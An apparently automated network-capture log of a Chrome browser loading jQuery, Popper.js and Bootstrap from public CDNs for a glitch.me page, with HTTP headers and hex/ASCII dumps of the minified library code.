            2024-09-29 02:32:43 UTC1369INData Raw: 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20
            Data Ascii: tstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return
            2024-09-29 02:32:43 UTC1369INData Raw: 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2b 3d 7e 7e 28 31 65 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2c 64 6f 63 75 6d
            Data Ascii: ="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+=~~(1e6*Math.random()),docum
            2024-09-29 02:32:43 UTC1369INData Raw: 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3b 74 26 26 28 65 3d
            Data Ascii: t",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function(t){var e=this._element;t&&(e=
            2024-09-29 02:32:43 UTC1369INData Raw: 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 41 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 62 75 74 74 6f 6e 73 22 5d 27 2c 44 3d 22 69 6e 70 75 74 22 2c 77 3d 22 2e 61 63 74 69 76
            Data Ascii: ace,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',A='[data-toggle="buttons"]',D="input",w=".activ
            2024-09-29 02:32:43 UTC1369INData Raw: 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6d 2e 66 6e 5b 70 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 6b 2c 6d 2e 66 6e 5b 70 5d 2e 6e 6f 43 6f 6e 66 6c 69 63
            Data Ascii: ss(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryInterface,m.fn[p].Constructor=k,m.fn[p].noConflic
            2024-09-29 02:32:43 UTC1369INData Raw: 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c 74 2e 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64
            Data Ascii: teners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility")&&this.next()},t.prev=function(){this._isSlid
            2024-09-29 02:32:43 UTC1369INData Raw: 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 75 73 65 28 74 29 7d 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 4c 45 41 56 45
            Data Ascii: ig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,function(t){return e.pause(t)}).on(Q.MOUSELEAVE
            2024-09-29 02:32:43 UTC1369INData Raw: 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 58 29 2c 61 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d
            Data Ascii: r e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s=this._element.querySelector(X),a=this._getItem
            2024-09-29 02:32:43 UTC1369INData Raw: 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28 6e 26 26 50 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 42 29 29 7b 76 61 72 20 69 3d 6c 28 7b 7d 2c 50 28 6e 29 2e 64 61 74 61 28 29 2c 50 28 74
            Data Ascii: d"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(n&&P(n).hasClass(B)){var i=l({},P(n).data(),P(t


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.649727151.101.2.1374433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC600OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
            Host: code.jquery.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://certain-jeweled-verse.glitch.me
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC611INHTTP/1.1 200 OK
            Connection: close
            Content-Length: 69597
            Server: nginx
            Content-Type: application/javascript; charset=utf-8
            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
            ETag: "28feccc0-10fdd"
            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
            Access-Control-Allow-Origin: *
            Cross-Origin-Resource-Policy: cross-origin
            Via: 1.1 varnish, 1.1 varnish
            Accept-Ranges: bytes
            Age: 1971674
            Date: Sun, 29 Sep 2024 02:32:43 GMT
            X-Served-By: cache-lga21984-LGA, cache-ewr-kewr1740071-EWR
            X-Cache: HIT, HIT
            X-Cache-Hits: 42, 0
            X-Timer: S1727577163.379034,VS0,VE2
            Vary: Accept-Encoding
            2024-09-29 02:32:43 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
            Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
            2024-09-29 02:32:43 UTC16384INData Raw: 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 26 26 6a 5b 32 5d 2c 6d 3d 6e 26 26 71 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 6e 5d 3b 77 68 69 6c 65 28 6d 3d 2b 2b 6e 26 26 6d 26 26 6d 5b 70 5d 7c 7c 28 74 3d 6e 3d 30 29 7c 7c 6f 2e 70 6f 70 28 29 29 69 66 28 31 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 26 26 2b 2b 74 26 26 6d 3d 3d 3d 62 29 7b 6b 5b 61 5d 3d 5b 77 2c 6e 2c 74 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6d 3d 62 2c 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6a 3d 6b 5b 61 5d 7c 7c 5b 5d 2c 6e 3d 6a 5b 30 5d 3d 3d 3d 77 26 26 6a 5b 31 5d 2c 74 3d 6e 29 2c 74 3d 3d 3d 21 31 29 77 68 69
            Data Ascii: |[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)whi
            2024-09-29 02:32:43 UTC16384INData Raw: 65 2c 66 2c 67 29 7b 76 61 72 20 68 3d 30 2c 69 3d 61 2e 6c 65 6e 67 74 68 2c 6a 3d 6e 75 6c 6c 3d 3d 63 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 2e 74 79 70 65 28 63 29 29 7b 65 3d 21 30 3b 66 6f 72 28 68 20 69 6e 20 63 29 54 28 61 2c 62 2c 68 2c 63 5b 68 5d 2c 21 30 2c 66 2c 67 29 7d 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 65 3d 21 30 2c 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 64 29 7c 7c 28 67 3d 21 30 29 2c 6a 26 26 28 67 3f 28 62 2e 63 61 6c 6c 28 61 2c 64 29 2c 62 3d 6e 75 6c 6c 29 3a 28 6a 3d 62 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 6a 2e 63 61 6c 6c 28 72 28 61 29 2c 63 29 7d 29 29 2c 62 29 29 66 6f 72 28 3b 68 3c 69 3b 68 2b 2b 29 62 28 61 5b 68 5d 2c 63 2c 67 3f 64 3a 64 2e 63
            Data Ascii: e,f,g){var h=0,i=a.length,j=null==c;if("object"===r.type(c)){e=!0;for(h in c)T(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,r.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(r(a),c)})),b))for(;h<i;h++)b(a[h],c,g?d:d.c
            2024-09-29 02:32:43 UTC16384INData Raw: 6f 5d 29 7b 69 66 28 62 2e 65 76 65 6e 74 73 29 66 6f 72 28 64 20 69 6e 20 62 2e 65 76 65 6e 74 73 29 65 5b 64 5d 3f 72 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 63 2c 64 29 3a 72 2e 72 65 6d 6f 76 65 45 76 65 6e 74 28 63 2c 64 2c 62 2e 68 61 6e 64 6c 65 29 3b 63 5b 57 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 7d 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 26 26 28 63 5b 58 2e 65 78 70 61 6e 64 6f 5d 3d 76 6f 69 64 20 30 29 7d 7d 7d 29 2c 72 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 64 65 74 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4b 61 28 74 68 69 73 2c 61 29 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29
            Data Ascii: o]){if(b.events)for(d in b.events)e[d]?r.event.remove(c,d):r.removeEvent(c,d,b.handle);c[W.expando]=void 0}c[X.expando]&&(c[X.expando]=void 0)}}}),r.fn.extend({detach:function(a){return Ka(this,a,!0)},remove:function(a){return Ka(this,a)},text:function(a)
            2024-09-29 02:32:43 UTC4061INData Raw: 46 75 6e 63 74 69 6f 6e 28 61 29 3f 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 49 6e 6e 65 72 28 61 2e 63 61 6c 6c 28 74 68 69 73 2c 62 29 29 7d 29 3a 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 72 28 74 68 69 73 29 2c 63 3d 62 2e 63 6f 6e 74 65 6e 74 73 28 29 3b 63 2e 6c 65 6e 67 74 68 3f 63 2e 77 72 61 70 41 6c 6c 28 61 29 3a 62 2e 61 70 70 65 6e 64 28 61 29 7d 29 7d 2c 77 72 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 28 74 68 69 73 29 2e 77 72 61 70 41 6c 6c 28 62 3f 61 2e 63 61 6c 6c 28 74 68 69 73 2c
            Data Ascii: Function(a)?this.each(function(b){r(this).wrapInner(a.call(this,b))}):this.each(function(){var b=r(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=r.isFunction(a);return this.each(function(c){r(this).wrapAll(b?a.call(this,


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.649728104.17.25.144433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:43 UTC625OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
            Host: cdnjs.cloudflare.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://certain-jeweled-verse.glitch.me
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: cross-site
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Referer: https://certain-jeweled-verse.glitch.me/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-29 02:32:43 UTC930INHTTP/1.1 200 OK
            Date: Sun, 29 Sep 2024 02:32:43 GMT
            Content-Type: application/javascript; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            Cache-Control: public, max-age=30672000
            ETag: W/"5eb03fa9-4af4"
            Last-Modified: Mon, 04 May 2020 16:15:37 GMT
            cf-cdnjs-via: cfworker/kv
            Cross-Origin-Resource-Policy: cross-origin
            Timing-Allow-Origin: *
            X-Content-Type-Options: nosniff
            CF-Cache-Status: HIT
            Age: 877392
            Expires: Fri, 19 Sep 2025 02:32:43 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYTtgpPaHpZ45ZTDGl2pS6y2ZH%2FALY400p%2FGkfRBgTdGi1GvwfLEwCwfJGujWKFXpzsWP%2F5CGHXU4IcIthoPMDL%2FE5rH8g6kV9xo9yDqCLbUECKoULqNSPKsyhVakFJ8RjVuCxBh"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
            Strict-Transport-Security: max-age=15780000
            Server: cloudflare
            CF-RAY: 8ca89077592541b4-EWR
            2024-09-29 02:32:43 UTC439INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
            Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
            2024-09-29 02:32:43 UTC1369INData Raw: 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65 74 75 72 6e 20 65 2e 62 6f 64 79 3b 7d 76 61 72 20 69 3d 74 28 65 29 2c 72 3d
            Data Ascii: ComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=
            2024-09-29 02:32:43 UTC1369INData Raw: 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72 27 2b 6f 2b 27 57 69 64 74 68 27 5d 2c 31 30 29 2b 70 61 72 73 65 46 6c 6f 61 74 28
